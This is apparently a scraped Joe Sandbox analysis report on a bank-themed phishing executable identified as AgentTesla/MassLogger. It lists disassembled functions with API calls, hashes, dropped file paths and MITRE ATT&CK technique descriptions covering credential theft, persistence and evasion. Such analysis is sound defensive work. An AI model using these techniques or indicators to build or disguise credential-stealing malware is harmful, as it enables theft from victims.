String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 2574300362-1355242751
Opcode ID: 6704f55e9b3e5073255df892394aa5819afeb5d249e54ff22a30446420a86181
Instruction ID: 7900d83ef0c58a02ccb2f292944b1ac12cf4aa61bc6e1629d056a82b9c7c2e6f
Opcode Fuzzy Hash: 6704f55e9b3e5073255df892394aa5819afeb5d249e54ff22a30446420a86181
Instruction Fuzzy Hash: 96D05E39618B129EC7244B31EC08F0176E4EB49305B00841DA946D2260E6B0C8808610

Function 008F91CC Relevance: 6.2, APIs: 4, Instructions: 201memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 008F91DD
SysAllocString.OLEAUT32(00000048), ref: 008F9286
VariantCopy.OLEAUT32(00000000,00000000), ref: 008F92B5
VariantClear.OLEAUT32(?), ref: 008F92DC

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Variant$AllocClearCopyInitString
String ID:
API String ID: 2808897238-0
Opcode ID: 5d3d8aadee4d85578ee1da28ed49450d11109904c0927d36bca879430f6bf97e
Instruction ID: 2c2f6dd660dcd55363d7ae3fb78270cbf23f6bd783bc5c6c01d52c8f688c9866
Opcode Fuzzy Hash: 5d3d8aadee4d85578ee1da28ed49450d11109904c0927d36bca879430f6bf97e
Instruction Fuzzy Hash: 9F519434A0430ADBDB24AF799891B3EB3A9FF55318F20981FE686C73D1DB7198808705

Function 008F4004 Relevance: 6.1, APIs: 4, Instructions: 96COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 008F4038
__isleadbyte_l.LIBCMT ref: 008F4066
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008F4094
MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 008F40CA

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: eafdbf0cfe4c8db5570b82a23dac01eb2e07ad0b05b7359c017e715d387d3d7d
Instruction ID: 0cad01581de5b71c7653974b7667faf27081755492da858cc5d09d50bb1159d9
Opcode Fuzzy Hash: eafdbf0cfe4c8db5570b82a23dac01eb2e07ad0b05b7359c017e715d387d3d7d
Instruction Fuzzy Hash: 3531D030604A4AAFDB219F75C844BBB7BB5FF81310F15542AEB61CB1A0EB31D890DB90

Function 0092F1D7 Relevance: 6.1, APIs: 4, Instructions: 80windowCOMMON

Download Yara Rule

APIs

Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F

GetCursorPos.USER32(?), ref: 0092F211
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,0093E4C0,?,?,?,?,?), ref: 0092F226
GetCursorPos.USER32(?), ref: 0092F270
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,0093E4C0,?,?,?), ref: 0092F2A6

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 8324007498f5febec300b3b2e9e67d9ea0586beca39e65404b237f439143b288
Instruction ID: d594dce20cb3ee0dc6ccb62f1b7e0b14635fd280632c54372ab2f0f63047da45
Opcode Fuzzy Hash: 8324007498f5febec300b3b2e9e67d9ea0586beca39e65404b237f439143b288
Instruction Fuzzy Hash: 2C219E3D601028EFDB258F94E868EEA7BB9EB0A310F144179F915872A9D7309951EB50

Function 008FB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 008FAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008FAA79
Part of subcall function 008FAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008FAA83
Part of subcall function 008FAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008FAA92
Part of subcall function 008FAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008FAA99
Part of subcall function 008FAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008FAAAF

GetLengthSid.ADVAPI32(?,00000000,008FADE4,?,?), ref: 008FB21B
GetProcessHeap.KERNEL32(00000008,00000000), ref: 008FB227
HeapAlloc.KERNEL32(00000000), ref: 008FB22E
CopySid.ADVAPI32(?,00000000,?), ref: 008FB247

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
String ID:
API String ID: 4217664535-0
Opcode ID: 35819177096d810c0aff2e4fe694229de27bf5dab53dd5bcd5ca60fb1825e4a3
Instruction ID: 12873bf31f5048e5db1daa4202ff08107197e61e672d85cb6ed866a6dc9c8e68
Opcode Fuzzy Hash: 35819177096d810c0aff2e4fe694229de27bf5dab53dd5bcd5ca60fb1825e4a3
Instruction Fuzzy Hash: E5119175A11209EFDB189FA8DC95EBEB7A9FF85314F14802DEA42D7210D731AE44DB10

Function 008DD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008DD1BA
GetStockObject.GDI32(00000011), ref: 008DD1CE
SendMessageW.USER32(00000000,00000030,00000000), ref: 008DD1D8

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 28df766757c2f57f05bce80dfcbf8dc768d6d4ea422584a8a2ee46b7abc2a7a6
Instruction ID: 96dbb54dfba0b0bd8f150b67eb42b49233b3ef9d4beb7cbef0d8208c23714384
Opcode Fuzzy Hash: 28df766757c2f57f05bce80dfcbf8dc768d6d4ea422584a8a2ee46b7abc2a7a6
Instruction Fuzzy Hash: 6111C0B6106609BFEF124FA0DC50EEABB6DFF09368F040202FA1592250C731DC60EBA0

Function 008FB0CD Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 008FB0D6
OpenThreadToken.ADVAPI32(00000000), ref: 008FB0DD
GetCurrentProcess.KERNEL32(00000028,?), ref: 008FB0EA
OpenProcessToken.ADVAPI32(00000000), ref: 008FB0F1

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 14904a103281df1938b3a72c29a0161a977ed566e24f2eacad22c7e2d6725114
Instruction ID: 1fe9fd78762b80db13a81ad9c739603461ab0f8bb874d64d1598c04610e44205
Opcode Fuzzy Hash: 14904a103281df1938b3a72c29a0161a977ed566e24f2eacad22c7e2d6725114
Instruction Fuzzy Hash: 1EE0863E7162119BD7201FB19C0CF573BA8FF96795F018828F741D6040DB348401D760

Function 008FB2D4 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 008FB2DF
UnloadUserProfile.USERENV(?,?), ref: 008FB2EB
CloseHandle.KERNEL32(?), ref: 008FB2F4
CloseHandle.KERNEL32(?), ref: 008FB2FC

Part of subcall function 008FAB24: GetProcessHeap.KERNEL32(00000000,?,008FA848), ref: 008FAB2B
Part of subcall function 008FAB24: HeapFree.KERNEL32(00000000), ref: 008FAB32

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: 89aab322d4d137209bc47b1d651a2a4c28ee5274ff08025f81e2614acd921eb0
Instruction ID: 4ce2e227bca223691a8edcfefb8dbd6c0b05a32fd61b936ecef6cfaf6870c1bb
Opcode Fuzzy Hash: 89aab322d4d137209bc47b1d651a2a4c28ee5274ff08025f81e2614acd921eb0
Instruction Fuzzy Hash: 5CE0B67E11A005BBCB022FA5EC08C5DFBA6FF8A7253108221F62581575CB32A871FB91

Function 00915180 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00915190
InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 009151C6

Strings

|, xrefs: 009151B5

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 387a196859081bbdfc53998803ee48c29af16db2d6eab7e59e865b1f8be8c627
Instruction ID: 9a7fb5b715e011c9de864e31c8aa08a2d1a80a5b987b426b645d21c7a367050d
Opcode Fuzzy Hash: 387a196859081bbdfc53998803ee48c29af16db2d6eab7e59e865b1f8be8c627
Instruction Fuzzy Hash: 2F313971D00109EBCF11EFE4CC85EEE7FB9FF58710F100019E819A6166EA31A946CBA1

Function 00905157 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 009051C6
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00905201

Strings

0, xrefs: 009051BF

Memory Dump Source

Source File: 00000002.00000002.1282722558.00000000008C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 008C0000, based on PE: true

Associated: 00000002.00000002.1282681223.00000000008C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000094D000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282837631.000000000096E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282927612.000000000097A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1282967432.0000000000984000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8c0000_spadixes.jbxd

Similarity

API ID: InfoItemMenu_memset
String ID: 0
API String ID: 2223754486-4108050209
Opcode ID: 6d793eba45e7360be70352d1c93070df4b89828a9bab3c7e4558648701918b13
Instruction ID: 45e171478450cc86d3a01cd77a04cf29c2bbc572ae88896fb56337841aa140aa
Opcode Fuzzy Hash: 6d793eba45e7360be70352d1c93070df4b89828a9bab3c7e4558648701918b13
Instruction Fuzzy Hash: 2331AE71A00604EFEB24CF9DD845BAFBBF8AF45350F150419E9A1E62E0D7709A84DF11

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.
Tactics:	Defense Evasion, Initial Access, Persistence, Privilege Escalation
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, User Account: User Account Authentication
Platforms:	Azure AD, Containers, Google Workspace, IaaS, Linux, macOS, Network, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Traffic Flow, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Driver: Driver Load, File: File Metadata, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Creation, Service: Service Creation, Service: Service Modification, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in an attempt to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Security constructs such as permission levels will often hinder access to information and use of certain techniques, so adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions.
Tactics:	Privilege Escalation
Data Sources:	Driver: Driver Load, Process: Process Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Agenttesla

Threatname: MassLogger

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAI.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\TrojanAIbot.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\svchost.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\Lityerses

C:\Users\user\AppData\Local\Temp\TrojanAI.exe

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1d4g5ayw.2at.ps1

Windows Analysis Report
Ziraat_Bankasi_Swift_Mesaji_BXB04958T.exe

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
